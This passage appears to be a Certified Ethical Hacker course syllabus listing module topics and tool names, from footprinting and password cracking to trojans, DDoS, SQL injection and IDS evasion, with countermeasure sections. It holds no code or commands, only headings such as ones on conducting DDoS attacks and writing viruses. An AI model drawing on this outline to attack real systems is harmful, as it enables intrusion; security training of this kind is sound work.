Physical security breach incidents
Understanding physical security
What is the need for physical security?
Who is accountable for physical security?
Factors affecting physical security
Linux Hacking
Understand how to compile a Linux Kernel
Understand GCC compilation commands
Understand how to install LKM modules
Understand Linux hardening methods
Evading IDS, Honeypots and Firewalls
List the types of Intrusion Detection Systems and evasion techniques
List firewall and honeypot evasion techniques
Buffer Overflows
Overview of stack based buffer overflows
Identify the different types of buffer overflows and methods of detection
Overview of buffer overflow mutation techniques
Cryptography
Overview of cryptography and encryption techniques
Describe how public and private keys are generated
Overview of MD5, SHA, RC4, RC5, Blowfish algorithms
Penetration Testing Methodologies
Overview of penetration testing methodologies
List the penetration testing steps
Overview of the Pen-Test legal framework
Overview of the Pen-Test deliverables
List the automated penetration testing tools
Course Outline Version 5
Module 1: Introduction to Ethical Hacking
Why Security?
Essential Terminologies
Elements of Security
The Security, Functionality, and Ease of Use Triangle
What Does a Malicious Hacker Do?
o Reconnaissance
o Scanning
o Gaining access
o Maintaining access
o Covering Tracks
Types of Hacker Attacks
o Operating System attacks
o Application-level attacks
o Shrink Wrap code attacks
o Misconfiguration attacks
Hacktivism
Hacker Classes
Hacker Classes and Ethical Hacking
What Do Ethical Hackers Do?
Can Hacking be Ethical?
How to Become an Ethical Hacker?
Skill Profile of an Ethical Hacker
What is Vulnerability Research?
Why Hackers Need Vulnerability Research?
Vulnerability Research Tools
Vulnerability Research Websites
How to Conduct Ethical Hacking?
Approaches to Ethical Hacking
Ethical Hacking Testing
Ethical Hacking Deliverables
Computer Crimes and Implications
Legal Perspective
o U.S. Federal Law
o Japan’s Cyber Laws
o United Kingdom’s Cyber Laws
o Australia’s Cyber Laws
o Germany’s Cyber Laws
o Singapore’s Cyber Laws
Module 2: Footprinting
Revisiting Reconnaissance
Defining of Footprinting
Information Gathering Methodology
Unearthing Initial Information
Finding a Company’s URL
Internal URL
Extracting Archive 0f a Website
Google Search for Company’s Info.
People Search
Footprinting Through Job Sites
Passive Information Gathering
Competitive Intelligence Gathering
Why Do You Need Competitive Intelligence?
Companies Providing Competitive Intelligence Services
Competitive Intelligence
o When Did This Company Begin?
o How Did It Develop?
o What Are This Company's Plans?
o What Does Expert Opinion Say About The Company?
o Who Are The Leading Competitors?
Public and Private Websites
Tools
o DNS Enumerator
o SpiderFoot
o Sensepost Footprint Tools
• BiLE.pl
• BiLE-weigh.pl
• tld-expand.pl
• vet-IPrange.pl
• qtrace.pl
• vet-mx.pl
• jarf-rev
• jarf-dnsbrute
o Wikito Footprinting Tool
o Web Data Extractor Tool
o Whois
o Nslookup
o Necrosoft
o ARIN
o Traceroute
o Neo Trace
o GEOSpider
o Geowhere
o GoogleEarth
o VisualRoute Trace
o Kartoo Search Engine
o Touchgraph Visual Browser
o SmartWhois
o VisualRoute Mail Tracker
o eMailTrackerPro
o Read Notify
o HTTrack Web Site Copier
o Web Ripper
o robots.txt
o Website watcher
o E-mail Spider
o Power E-mail Collector Tool
Steps to Perform Footprinting
Module 3: Scanning
Definition of Scanning
Types of Scanning
o Port Scanning
o Network Scanning
o Vulnerability Scanning
Objectives of Scanning
CEH Scanning Methodology
o Check for live systems
• ICMP Scanning
• Angry IP
• HPING2
• Ping Sweep
• Firewalk
o Check for open ports
• Nmap
• TCP Communication Flags
• Three Way Handshake
• SYN Stealth / Half Open Scan
• Stealth Scan
• Xmas Scan
• FIN Scan
• NULL Scan
• IDLE Scan
• ICMP Echo Scanning/List Scan
• TCP Connect / Full Open Scan
• FTP Bounce Scan
• FTP Bounce Attack
• SYN/FIN Scanning Using IP Fragments
• UDP Scanning
• Reverse Ident Scanning
• RPC Scan
• Window Scan
• Blaster Scan
• PortScan Plus, Strobe
• IPSecScan
• NetScan Tools Pro
• WUPS – UDP Scanner
• SuperScan
• IPScanner
• MegaPing
• Global Network Inventory Scanner
• Net Tools Suite Pack
• FloppyScan
• War Dialer Technique
• Why War Dialing?
• Wardialing
• PhoneSweep
• THC Scan
• SandTrap Tool
o Banner grabbing/OS Fingerprinting
• OS Fingerprinting
• Active Stack Fingerprinting
• Passive Fingerprinting
• Active Banner Grabbing Using Telnet
• GET REQUESTS
• p0f – Banner Grabbing Tool
• p0f for Windows
• Httprint Banner Grabbing Tool
• Active Stack Fingerprinting
• XPROBE2
• RING V2
• Netcraft
• Disabling or Changing Banner
• Apache Server
• IIS Server
• IIS Lockdown Tool
• ServerMask
• Hiding File Extensions
• PageXchanger 2.0
o Identify Service
o Scan for Vulnerability
• Bidiblah Automated Scanner
• Qualys Web-based Scanner
• SAINT
• ISS Security Scanner
• Nessus
• GFI LANGuard
• SATAN (Security Administrator’s Tool for Analyzing Networks)
• Retina
• NIKTO
• SAFEsuite Internet Scanner
• IdentTCPScan
o Draw network diagrams of Vulnerable hosts
• Cheops
• FriendlyPinger
o Prepare proxies
• Proxy Servers
• Use of Proxies for Attack
• SocksChain
• Proxy Workbench
• ProxyManager Tool
• Super Proxy Helper Tool
• Happy Browser Tool (Proxy-based)
• MultiProxy
• TOR Proxy Chaining Software
o Anonymizers
• Primedius Anonymizer
• Browzar
• Torpark Browser
• G-Zapper - Google Cookies
o SSL Proxy Tool
o HTTP Tunneling Techniques
o HTTPort
o Spoofing IP Address - Source Routing
o Detecting IP Spoofing
o Despoof Tool
o Scanning Countermeasures
o Tool: SentryPC
Module 4: Enumeration
Overview of System Hacking Cycle
What is Enumeration?
Techniques for Enumeration
Netbios Null Sessions
Tool
o DumpSec
o NetBIOS Enumeration Using Netview
o Nbtstat
o SuperScan4
o Enum
o sid2user
o user2sid
o GetAcct
Null Session Countermeasures
PSTools
o PsExec
o PsFile
o PsGetSid
o PsKill
o PsInfo
o PsList
o PsLoggedOn
o PsLogList
o PsPasswd
o PsService
o PsShutdown
o PsSuspend
o PsUptime
SNMP Enumeration
Management Information Base
Tools
o SNMPutil
o Solarwinds
o SNScan V1.05
o Getif SNMP MIB Browser
UNIX Enumeration
SNMP UNIX Enumeration
SNMP Enumeration Countermeasures
Tools
o Winfingerprint
o Windows Active Directory Attack Tool
o IP Tools Scanner
o Enumerate Systems Using Default Passwords
Steps to Perform Enumeration
Module 5: System Hacking
Cracking Passwords
o Password Types
o Types of Password Attacks
o Passive Online – Wire Sniffing
o Passive Online Attacks
o Active Online – Password Guessing
o Offline Attacks
• Dictionary Attack
• Hybrid Attack
• Brute-force Attack
• Pre-computed Hashes
o Non-Technical Attacks
o Password Mitigation
o Permanent Account Lockout – Employee Privilege Abuse
o Administrator Password Guessing
o Manual Password Cracking Algorithm
o Automatic Password Cracking Algorithm
o Performing Automated Password Guessing
o Tools
• NAT
• Smbbf (SMB Passive Brute Force Tool)
• SmbCrack Tool
• Legion
• LOphtcrack
o Microsoft Authentication - LM, NTLMv1, and NTLMv2
o Kerberos Authentication
o What is LAN Manager Hash?
o Salting
o Tools
• PWdump2 and Pwdump3
• Rainbowcrack
• KerbCrack
• NBTDeputy
• NetBIOS DoS Attack
• John the Ripper
o Password Sniffing
o How to Sniff SMB Credentials?
o Sniffing Hashes Using LophtCrack
o Tools
• ScoopLM
• SMB Replay Attacks
• Replay Attack Tool: SMBProxy
• Hacking Tool: SMB Grind
• Hacking Tool: SMBDie
o SMBRelay Weaknesses & Countermeasures
o Password Cracking Countermeasures
o LM Hash Backward Compatibility
o How to Disable LM HASH?
o Tools
• Password Brute-Force Estimate Tool
• Syskey Utility
Escalating Privileges
o Privilege Escalation
o Cracking NT/2000 Passwords
o Active@ Password Changer
o Change Recovery Console Password
o Privilege Escalation Tool: x.exe
Executing applications
o Tool:
• Psexec
• Remoexec
• Alchemy Remote Executor
• Keystroke Loggers
• E-mail Keylogger
• Spytector FTP Keylogger
• IKS Software Keylogger
• Ghost Keylogger
• Hardware Keylogger
• Keyboard Keylogger: KeyGhost Security Keyboard
• USB Keylogger:KeyGhost USB Keylogger
o What is Spyware?
o Tools
• Spyware: Spector
• Remote Spy
• eBlaster
• Stealth Voice Recorder
• Stealth Keylogger
• Stealth Website Logger
• Digi-Watcher Video Surveillance
• Desktop Spy Screen Capture Program
• Telephone Spy
• Print Monitor Spy Tool
• Perfect Keylogger
• Stealth Email Redirector
• Spy Software: Wiretap Professional
• Spy Software: FlexiSpy
• PC PhoneHome
o Keylogger Countermeasures
o Anti-Keylogger
o PrivacyKeyboard
Hiding Files
o Hacking Tool: RootKit
o Why Rootkits?
o Rootkits in Linux
o Detecting Rootkits
o Rootkit Detection Tools
• BlackLight from F-Secure Corp
• RootkitRevealer from Sysinternals
• Malicious Software Removal Tool from Microsoft Corp
o Sony Rootkit Case Study
o Planting the NT/2000 Rootkit
o Rootkits
• Fu
• AFX Rootkit 2005
• Nuclear
• Vanquish
o Rootkit Countermeasures
o Patchfinder2.0
o RootkitRevealer
o Creating Alternate Data Streams
o How to Create NTFS Streams?
o NTFS Stream Manipulation
o NTFS Streams Countermeasures
o NTFS Stream Detectors
• ADS Spy
• ADS Tools
o What is Steganography?
o Tools
• Merge Streams
• Invisible Folders
• Invisible Secrets 4
• Image Hide
• Stealth Files
• Steganography
• Masker Steganography Tool
• Hermetic Stego
• DCPP – Hide an Operating System
• Camera/Shy
• Mp3Stego
• Snow.exe
o Video Steganography
o Steganography Detection
o SIDS ( Stego intrusion detection system )
o High-Level View
o Tool : dskprobe.exe
Covering tracks
o Disabling Auditing
o Clearing the Event Log
o Tools
• elsave.exe
• Winzapper
• Evidence Eliminator
• Traceless
• Tracks Eraser Pro
• ZeroTracks
Module 6: Trojans and Backdoors
Introduction
Effect on Business
What is a Trojan?
Overt and Covert Channels
Working of Trojans
Different Types of Trojans
What Do Trojan Creators Look For?
Different Ways a Trojan Can Get into a System
Indications of a Trojan Attack
Ports Used by Trojans
How to Determine which Ports are “Listening”?
Classic Trojans Found in the Wild
Trojans
o Tini
o iCmd
o NetBus
o Netcat
o Beast
o MoSucker
o Proxy Server
o SARS Trojan Notification
Wrappers
Wrapper Covert Program
Wrapping Tools
o One file EXE Maker
o Yet Another Binder
o Pretator Wrapper
Packaging Tool: WordPad
RemoteByMail
Tool: Icon Plus
Defacing Application: Restorator
HTTP Trojans
Trojan Attack through Http
HTTP Trojan (HTTP RAT)
Shttpd Trojan - HTTP Server
Reverse Connecting Trojans
Nuclear RAT Trojan (Reverse Connecting)
Tool: BadLuck Destructive Trojan
ICMP Tunneling
ScreenSaver Password Hack Tool – Dummylock
Trojan
o Phatbot
o Amitis
o Senna Spy
o QAZ
o Back Orifice
o Back Oriffice 2000
o SubSeven
o CyberSpy Telnet Trojan
o Subroot Telnet Trojan
o Let Me Rule! 2.0 BETA 9
o Donald Dick
o RECUB
Hacking Tool: Loki
Atelier Web Remote Commander
Trojan Horse Construction Kit
How to Detect Trojans?
Tools
o Netstat
o fPort
o TCPView
o CurrPorts
o Process Viewer
o What’s on My Computer
o Super System Helper
Delete Suspicious Device Drivers
Inzider - Tracks Processes and Ports
Tools
o What's Running?
o MSConfig
o Registry-What’s Running
o Autoruns
o Hijack This (System Checker)
o Startup List
Anti-Trojan Software
Evading Anti-Virus Techniques
Evading Anti-Trojan/Anti-Virus Using Stealth Tools v2.0
Backdoor Countermeasures
Tools
o Tripwire
o System File Verification
o MD5sum.exe
o Microsoft Windows Defender
How to Avoid a Trojan Infection?
Module 7: Sniffers
Definition of Sniffing
Protocols Vulnerable to Sniffing
o Tool: Network View – Scans the Network for Devices
o The Dude Sniffer
o Ethereal
o tcpdump
Types of Sniffing
o Passive Sniffing
o Active sniffing
ARP - What is Address Resolution Protocol?
ARP Spoofing Attack
o How Does ARP Spoofing Work?
o ARP Poisoning
o Mac Duplicating Attack
Tools for ARP Spoofing
o Arpspoof (Linux-based tool)
o Ettercap (Linux and Windows)
MAC Flooding
Tools for MAC Flooding
o Macof (Linux-based tool)
o Etherflood (Linux and Windows)
Threats of ARP Poisoning
IRS – ARP Attack Tool
ARPWorks Tool
Tool: Nemesis
Sniffer Hacking Tools (dsniff package)
o Arpspoof
o Dnsspoof
o Dsniff
o Filesnarf
o Mailsnarf
o Msgsnarf
o Tcpkill
o Tcpnice
o Urlsnarf
o Webspy
o Webmitm
DNS Poisoning Techniques
Types of DNS Poisoning:
o Intranet DNS Spoofing (Local network)
o Internet DNS Spoofing (Remote network)
o Proxy Server DNS Poisoning
o DNS Cache Poisoning
Interactive TCP Relay
Sniffers
o HTTP Sniffer: EffeTech
o Ace Password Sniffer
o MSN Sniffer
o SmartSniff
o Session Capture Sniffer: NetWitness
o Session Capture Sniffer: NWreader
o Cain and Abel
o Packet Crafter Craft Custom TCP/IP Packets
o SMAC
o NetSetMan Tool
o Raw Sniffing Tools
o Sniffit
o Aldebaran
o Hunt
o NGSSniff
o Ntop
o Pf
o IPTraf
o EtherApe
o Netfilter
o Network Probe
o Maa Tec Network Analyzer
Tools
o Snort
o Windump
o Etherpeek
o Mac Changer
o Iris
o NetIntercept
o WinDNSSpoof
How to Detect Sniffing?
AntiSniff Tool
ArpWatch Tool
Countermeasures
Module 8: Denial of Service
What are Denial of Service Attacks?
Goal of DoS
Impact and the Modes of Attack
Types of Attacks
o DoS attack
o DDos attack
DoS Attack Classification
o Smurf
o Buffer Overflow Attack
o Ping of death
o Teardrop
o SYN Attack
DoS Attack Tools
o Jolt2
o Bubonic.c
o Land and LaTierra
o Targa
o Blast20
o Nemesy
o Panther2
o Crazy Pinger
o Some Trouble
o UDP Flood
o FSMax
Botnets
Uses of botnets
Types of Bots
o Agobot/Phatbot/Forbot/XtremBot
o SDBot/RBot/UrBot/UrXBot
o mIRC-based Bots - GT-Bots
Tool: Nuclear Bot
What is DDoS Attack?
Characteristics of DDoS Attacks
DDOS Unstoppable
Agent Handler Model
DDoS IRC based Model
DDoS Attack Taxonomy
Amplification Attack
Reflective DNS Attacks
Reflective DNS Attacks Tool: ihateperl.pl
DDoS Tools
o Trin00
o Tribe Flood Network (TFN)
o TFN2K
o Stacheldraht
o Shaft
o Trinity
o Knight
o Mstream
o Kaiten
Worms
Slammer Worm
Spread of Slammer Worm – 30 min
MyDoom.B
SCO Against MyDoom Worm
How to Conduct a DDoS Attack
The Reflected DoS Attacks
Reflection of the Exploit
Countermeasures for Reflected DoS
DDoS Countermeasures
Taxonomy of DDoS Countermeasures
Preventing Secondary Victims
Detect and Neutralize Handlers
Detect Potential Attacks
Mitigate or Stop the Effects of DDoS Attacks
Deflect Attacks
Post-attack Forensics
Packet Traceback
Module 9: Social Engineering
What is Social Engineering?
Human Weakness
“Rebecca” and “Jessica”
Office Workers
Types of Social Engineering
o Human-based
o Computer-based
Preventing Insider Threat
Common Targets of Social Engineering
Factors that make Companies Vulnerable to Attacks
Why is Social Engineering Effective?
Warning Signs of an Attack
Tool : Netcraft Anti-Phishing Toolbar
Phases in a Social Engineering Attack
Behaviors Vulnerable to Attacks
Impact on the Organization
Countermeasures
Policies and Procedures
Security Policies - Checklist
Phishing Attacks and Identity Theft
What is Phishing?
Phishing Report
Attacks
Hidden Frames
URL Obfuscation
URL Encoding Techniques
IP Address to Base 10 Formula
Karen’s URL Discombobulator
HTML Image Mapping Techniques
Fake Browser Address Bars
Fake Toolbars
Fake Status Bar
DNS Cache Poisoning Attack
Module 10: Session Hijacking
What is Session Hijacking?
Spoofing vs. Hijacking
Steps in Session Hijacking
Types of Session Hijacking
o Active
o Passive
The 3-Way Handshake
TCP Concepts 3-Way Handshake
Sequence Number Prediction
TCP/IP Hijacking
RST Hijacking
RST Hijacking Tool: hijack_rst.sh
Programs that Perform Session Hijacking
Hacking Tools
o Juggernaut
o Hunt
o TTY Watcher
o IP Watcher
o T-Sight
o Paros HTTP Session
Remote TCP Session Reset Utility
Dangers Posed by Hijacking
Protecting against Session Hijacking
Countermeasure: IP Security
IP-SEC
Module 11: Hacking Web Servers
How Web Servers Work
How are Web Servers Compromised?
How are Web Servers Defaced?
Apache Vulnerability
Attacks Against IIS
o IIS Components
o IIS Directory Traversal (Unicode) Attack
Unicode
o Unicode Directory Traversal Vulnerability
Hacking Tool: IISxploit.exe
Msw3prt IPP Vulnerability
WebDAV / ntdll.dll Vulnerability
RPC DCOM Vulnerability
ASN Exploits
ASP Trojan (cmd.asp)
IIS Logs
Network Tool: Log Analyzer
Hacking Tool: CleanIISLog
Unspecified Executable Path Vulnerability
Metasploit Framework
Immunity CANVAS Professional
Core Impact
Hotfixes and Patches
What is Patch Management?
Solution: UpdateExpert
Patch Management Tool
o Qfecheck
o HFNetChk
cacls.exe Utility
Vulnerability Scanners
Online Vulnerability Search Engine
Network Tools
o Whisker
o N-Stealth HTTP Vulnerability Scanner
Hacking Tool: WebInspect
Network Tool: Shadow Security Scanner
SecureIIS
Countermeasures
File System Traversal Countermeasures
Increasing Web Server Security
Web Server Protection Checklist
Module 12: Web Application Vulnerabilities
Web Application Setup
Web Application Hacking
Anatomy of an Attack
Web Application Threats
Cross-Site Scripting/XSS Flaws
o Countermeasures
SQL Injection
Command Injection Flaws
o Countermeasures
Cookie/Session Poisoning
o Countermeasures
Parameter/Form Tampering
Buffer Overflow
o Countermeasures
Directory Traversal/Forceful Browsing
o Countermeasures
Cryptographic Interception
Cookie Snooping
Authentication Hijacking
o Countermeasures
Log Tampering
Error Message Interception
Attack Obfuscation
Platform Exploits
DMZ Protocol Attacks
o Countermeasures
Security Management Exploits
Web Services Attacks
Zero-Day Attacks
Network Access Attacks
TCP Fragmentation
Hacking Tools
o Instant Source
o Wget
o WebSleuth
o BlackWidow
o WindowBomb
o Burp
o cURL
o dotDefender
o Google Hacking
o Acunetix Web Scanner
o AppScan – Web Application Scanner
o AccessDiver
Module 13: Web-based Password Cracking Techniques
Definition of Authentication
Authentication Mechanisms
o HTTP Authentication
• Basic Authentication
• Digest Authentication
o Integrated Windows (NTLM) Authentication
o Negotiate Authentication
o Certificate-based Authentication
o Forms-based Authentication
o RSA Secure Token
o Biometrics
• Face recognition
• Iris scanning
• Retina scanning
• Fingerprinting
• Hand geometry
• Voice recognition
How to Select a Good Password?
Things to Avoid in Passwords
Changing Your Password
Protecting Your Password
How Hackers get hold of Passwords?
Windows XP: Remove Saved Passwords
Microsoft Password Checker
What is a Password Cracker?
Modus Operandi of an Attacker Using Password Cracker
How does a Password Cracker Work?
Classification of Attacks
Password Guessing
Query String
Cookies
Dictionary Maker
Available Password Crackers
o LOphtcrack
o John The Ripper
o Brutus
Hacking Tools
o Obiwan
o Authforce
o Hydra
o Cain And Abel
o RAR
o Gammaprog
o WebCracker
o Munga Bunga
o PassList
o SnadBoy
o WinSSLMiM
o ReadCookies.html
o Wireless WEP Key Password Spy
o RockXP
o WinSSLMiM
o Password Spectator
Countermeasures
Module 14: SQL Injection
Introducing SQL injection
Exploiting Web Applications
SQL Injection Steps
o What Should You Look For?
o What If It Doesn’t Take Input?
o OLE DB Errors
o Input Validation Attack
SQL Injection Techniques
How to Test for SQL Injection Vulnerability?
How does it Work?
Executing Operating System Commands
Getting Output of SQL Query
Getting Data from the Database Using ODBC Error Message
How to Mine all Column Names of a Table?
How to Retrieve any Data?
How to Update/Insert Data into Database?
Automated SQL Injection Tool
o AutoMagic SQL
o Absinthe
SQL Injection in Oracle
SQL Injection in MySql Database
Attack against SQL Servers
SQL Server Resolution Service (SSRS)
Osql L- Probing
SQL Injection Automated Tools
o SQLDict
o SqlExec
o SQLbf
o SQLSmack
o SQL2.exe
SQL Injection Countermeasures
Preventing SQL Injection Attacks
SQL Injection Blocking Tool: SQLBlock
Acunetix Web Vulnerability Scanner
Module 15: Hacking Wireless Networks
Introduction to Wireless Networking
Wired Network vs. Wireless Network
Effects of Wireless Attacks on Business
Types of Wireless Networks
Advantages and Disadvantages of a Wireless Network
Wireless Standards
o 802.11a
o 802.11b – “WiFi”
o 802.11g
o 802.11i
o 802.11n
Related Technology and Carrier Networks
Antennas
Cantenna
Wireless Access Points
SSID
Beacon Frames
Is the SSID a Secret?
Setting Up a WLAN
Detecting a Wireless Network
How to Access a WLAN
Terminologies
Authentication and Association
Authentication Modes
Authentication and (Dis)Association Attacks
Rogue Access Points
Tools to Generate Rogue Access Points: Fake AP
Tools to Detect Rogue Access Points: Netstumbler
Tools to Detect Rogue Access Points: MiniStumbler
Wired Equivalent Privacy (WEP)
What is WPA?
WPA Vulnerabilities
WEP, WPA, and WPA2
Steps for Hacking Wireless Networks
o Step 1: Find networks to attack
o Step 2: Choose the network to attack
o Step 3: Analyze the network
o Step 4: Crack the WEP key
o Step 5: Sniff the network
Cracking WEP
Weak Keys (a.k.a. Weak IVs)
Problems with WEP’s Key Stream and Reuse
Automated WEP Crackers
Pad-Collection Attacks
XOR Encryption
Stream Cipher
WEP Tools
o Aircrack
o AirSnort
o WEPCrack
o WepLab
Temporal Key Integrity Protocol (TKIP)
LEAP: The Lightweight Extensible Authentication Protocol
LEAP Attacks
MAC Sniffing and AP Spoofing
Tool to Detect MAC Address Spoofing: Wellenreiter V2
Man-in-the-Middle Attack (MITM)
Denial-of-Service Attacks
Dos Attack Tool: Fatajack
Phone Jammers
Scanning Tools
o Redfang 2.5
o Kismet
o THC-WarDrive
o PrismStumbler
o MacStumbler
o Mognet
o WaveStumbler
o StumbVerter
o Netchaser V1.0 for Palm Tops
o AP Scanner
o SSID Sniff
o Wavemon
o Wireless Security Auditor (WSA)
o AirTraf
o Wifi Finder
o AirMagnet
Sniffing Tools
o AiroPeek
o NAI Wireless Sniffer
o Ethereal
o Aerosol v0.65
o vxSniffer
o EtherPEG
o DriftNet
o AirMagnet
o WinDump
o ssidsniff
Multiuse Tool: THC-RUT
PCR-PRO-1k Hardware Scanner
Tools
o WinPcap
o AirPcap
Securing Wireless Networks
Auditing Tool: BSD-Airtools
AirDefense Guard
WIDZ: Wireless Intrusion Detection System
Radius: Used as Additional Layer in Security
Google Secure Access
Module 16: Virus and Worms
Introduction to Virus
Virus History
Characteristics of a Virus
Working of Virus
o Infection Phase
o Attack Phase
Why People create computer viruses?
Symptoms of Virus-Like Attack
Virus Hoaxes
Chain Letters
How is a Worm different from a Virus?
Indications of Virus Attack
Hardware Threats
Software Threats
Virus Damage
Modes of Virus Infection
Stages of Virus Life
Virus Classification
How does a Virus Infect?
Storage Patterns of a Virus
System Sector Viruses
Stealth Virus
Bootable CD-ROM Virus
Self-Modification
Encryption with a Variable Key
Polymorphic Code
Viruses
o Metamorphic Virus
o Cavity Virus
o Sparse Infector Virus
o Companion Virus
o File Extension Virus
o I Love You Virus
o Melissa Virus
Famous Virus/Worms – JS.Spth
Klez Virus Analysis
Writing a Simple Virus Program
Virus Construction Kits
Virus Detection Methods
Virus Incident Response
What is Sheep Dip?
Sheep Dip Computer
Virus Analysis - IDA Pro Tool
Prevention is Better than Cure
Latest Viruses
Top 10 Viruses- 2006
Anti-Virus Software
o AVG Free Edition
o Norton Antivirus
o McAfee
Socketshield
Popular Anti-Virus Packages
Virus Databases
Module 17: Physical Security
Security Statistics
Physical Security Breach Incidents
Understanding Physical Security
What Is the Need for Physical Security?
Who Is Accountable for Physical Security?
Factors Affecting Physical Security
Physical Security Checklist
o Company surroundings
o Premises
o Reception
o Server
o Workstation area
o Wireless access points
o Other equipment, such as fax, and removable media
o Access control
o Biometric Devices
o Smart Cards
o Security Token
o Computer equipment maintenance
o Wiretapping
o Remote access
o Locks
Information Security
EPS (Electronic Physical Security)
Wireless Security
Laptop Theft: Security Statistics
Laptop Theft
Laptop Security Tools
Laptop Tracker - XTool Computer Tracker
Tools to Locate Stolen Laptops
Stop's Unique, Tamper-proof Patented Plate
Tool: TrueCrypt
Laptop Security Countermeasures
Mantrap
TEMPEST
Challenges in Ensuring Physical Security
Spyware Technologies
Spying Devices
Physical Security: Lock Down USB Ports
Tool: DeviceLock
Blocking the Use of USB Storage Devices
Track Stick GPS Tracking Device
Module 18: Linux Hacking
Why Linux?
Linux Distributions
Linux – Basics
Linux Live CD-ROMs
Basic Commands of Linux
Linux File Structure
Linux Networking Commands
Directories in Linux
Compiling the Linux Kernel
How to Install a Kernel Patch?
Compiling Programs in Linux
GCC Commands
Make Install Command
Linux Vulnerabilities
Chrooting
Why is Linux Hacked?
Linux Vulnerabilities in 2005
How to Apply Patches to Vulnerable Programs?
Scanning Networks
Tools
o Nmap in Linux
o Scanning Tool: Nessus
o Tool: Cheops
o Port Scan Detection Tools
Password Cracking in Linux
Firewall in Linux: IPTables
Basic Linux Operating System Defense
SARA (Security Auditor's Research Assistant)
Linux Tool
o Netcat
o tcpdump
o Snort
o SAINT
o Ethereal
o Abacus Port Sentry
o DSniff Collection
o Hping2
o Sniffit
o Nemesis
o LSOF
o IPTraf
o LIDS
o Hunt
o TCP Wrappers
Linux Loadable Kernel Modules
Hacking Tool: Linux Rootkits
Rootkits
o Knark
o Torn
o Tuxit
o Adore
o Ramen
o Beastkit
Rootkit Countermeasures
Linux Tools: Application Security
Advanced Intrusion Detection Environment (AIDE)
Linux Tools
o Security Testing Tools
o Encryption
o Log and Traffic Monitors
o Security Auditing Tool (LSAT)
Linux Security Countermeasures
Steps for Hardening Linux
Module 19: Evading IDS, Firewalls, and Honeypots
Introduction to Intrusion Detection Systems
Terminologies
o Intrusion Detection System (IDS)
• IDS Placement
• Ways to Detect an Intrusion
• Types of Intrusion Detection Systems
• System Integrity Verifiers (SIV)
• Tripwire
• Cisco Security Agent (CSA)
• Signature Analysis
• General Indications of Intrusion System Indications
• General Indications of Intrusion File System Indications
• General Indications of Intrusion Network Indications
• Intrusion Detection Tools
• Snort 2.x
• Steps to Perform After an IDS Detects an Attack
• Evading IDS Systems
• Ways to Evade IDS
• Tools to Evade IDS
• IDS Evading Tool: ADMutate
• Packet Generators
o Firewall
• What is a Firewall?
• What does a Firewall do?
• Packet Filtering
• What can't a Firewall do?
• How does a Firewall Work?
• Firewall Operations
• Hardware Firewall
• Software Firewall
• Types of Firewalls
• Packet Filtering Firewall
• IP Packet Filtering Firewall
• Circuit-Level Gateway
• TCP Packet Filtering Firewall
• Application-Level Firewall
• Application Packet Filtering Firewall
• Stateful Multilayer Inspection Firewall
• Firewall Identification
• Firewalking
• Banner Grabbing
• Breaching Firewalls
• Bypassing a Firewall Using HTTP Tunnel
• Placing Backdoors Through Firewalls
• Hiding behind a Covert Channel: LOKI
• ACK Tunneling
• Tools to Breach Firewalls
• Common Tool for Testing Firewall & IDS
• IDS Informer
• Evasion Gateway
• Firewall Informer
o Honeypot
• What is a Honeypot?
• The Honeynet Project
• Types of Honeypots
• Advantages and Disadvantages of a Honeypot
• Where to Place a Honeypot ?
• Honeypots
• SPECTER
• honeyd
• KFSensor
• Sebek
• Physical and Virtual Honeypots
• Tools to Detect Honeypots
• What to do When Hacked?
Module 20: Buffer Overflows
Why are Programs/Applications Vulnerable?
Buffer Overflows
Reasons for Buffer Overflow Attacks
Knowledge Required to Program Buffer Overflow Exploits
Types of Buffer Overflows
o Stack-based Buffer Overflow
• Understanding Assembly Language
• Understanding Stacks
• Shellcode
o Heap/BSS-based Buffer Overflow
How to Detect Buffer Overflows in a Program
Attacking a Real Program
NOPS
How to Mutate a Buffer Overflow Exploit
Defense Against Buffer Overflows
Tool to Defend Buffer Overflow
o Return Address Defender (RAD)
o StackGuard
o Immunix System
Vulnerability Search – ICAT
Simple Buffer Overflow in C
Code Analysis
Module 21: Cryptography
Public-key Cryptography
Working of Encryption
Digital Signature
RSA (Rivest Shamir Adleman)
RC4, RC5, RC6, Blowfish
Algorithms and Security
Brute-Force Attack
RSA Attacks
Message Digest Functions
One-way Bash Functions
MD5
SHA (Secure Hash Algorithm)
SSL (Secure Sockets Layer)
RC5
What is SSH?
SSH (Secure Shell)
Government Access to Keys (GAK)
RSA Challenge
distributed.net
Cleversafe Grid Builder
PGP (Pretty Good Privacy)
Code Breaking: Methodologies
Cryptography Attacks
Disk Encryption
Hacking Tool
o PGP Crack
o Magic Lantern
o WEPCrack
o Cracking S/MIME Encryption Using Idle CPU Time
o CypherCalc
o Command Line Scriptor
o CryptoHeaven
Module 22: Penetration Testing
Introduction to Penetration Testing
Categories of Security Assessments
Vulnerability Assessment
Limitations of Vulnerability Assessment
Types of Penetration Testing
Risk Management
Do-it-Yourself Testing
Outsourcing Penetration Testing Services
Terms of Engagement
Project Scope
Pentest Service Level Agreements
Testing Points
Testing Locations
Automated Testing
Manual Testing
Using DNS Domain Name and IP Address Information
Enumerating Information about Hosts on Publicly-Available Networks
Testing Network-Filtering Devices
Enumerating Devices
Denial of Service Emulation
Tools
o Appscan
o HackerShield
o Cerberus Internet Scanner
o Cybercop Scanner
o FoundScan Hardware Appliances
o Nessus
o NetRecon
o SAINT
o SecureNET Pro
o SecureScan
o SATAN
o SARA
o Security Analyzer
o STAT Analyzer
o VigilENT
o WebInspect
Evaluating Different Types of Pentest Tools
Asset Audit
Fault Trees and Attack Trees
GAP Analysis
Threat
Business Impact of Threat
Internal Metrics Threat
External Metrics Threat
Calculating Relative Criticality
Test Dependencies
Defect Tracking Tools
o Web-based Bug/Defect Tracking Software
o SWB Tracker
o Advanced Defect Tracking Web Edition
Disk Replication Tools
o Snapback DUP
o Daffodil Replicator
o Image MASSter 4002i
DNS Zone Transfer Testing Tools
o DNS analyzer
o Spam blacklist
Network Auditing Tools
o eTrust Audit (AUDIT LOG REPOSITORY)
o iInventory
o Centennial Discovery
Trace Route Tools and Services
o Ip Tracer 1.3
o Trellian Trace Route
Network Sniffing Tools
o Sniff’em
o PromiScan
Denial-of-Service Emulation Tools
o FlameThrower®
o Mercury LoadRunner™
o ClearSight Analyzer
Traditional Load Testing Tools
o WebMux
o SilkPerformer
o PORTENT Supreme
System Software Assessment Tools
o Database Scanner
o System Scanner
o Internet Scanner
Operating System Protection Tools
o Bastille Linux
o Engarde Secure Linux
Fingerprinting Tools
o Foundstone
o @Stake LC 5
Port Scanning Tools
o Superscan
o Advanced Port Scanner
o AW Security Port Scanner
Directory and File Access Control Tools
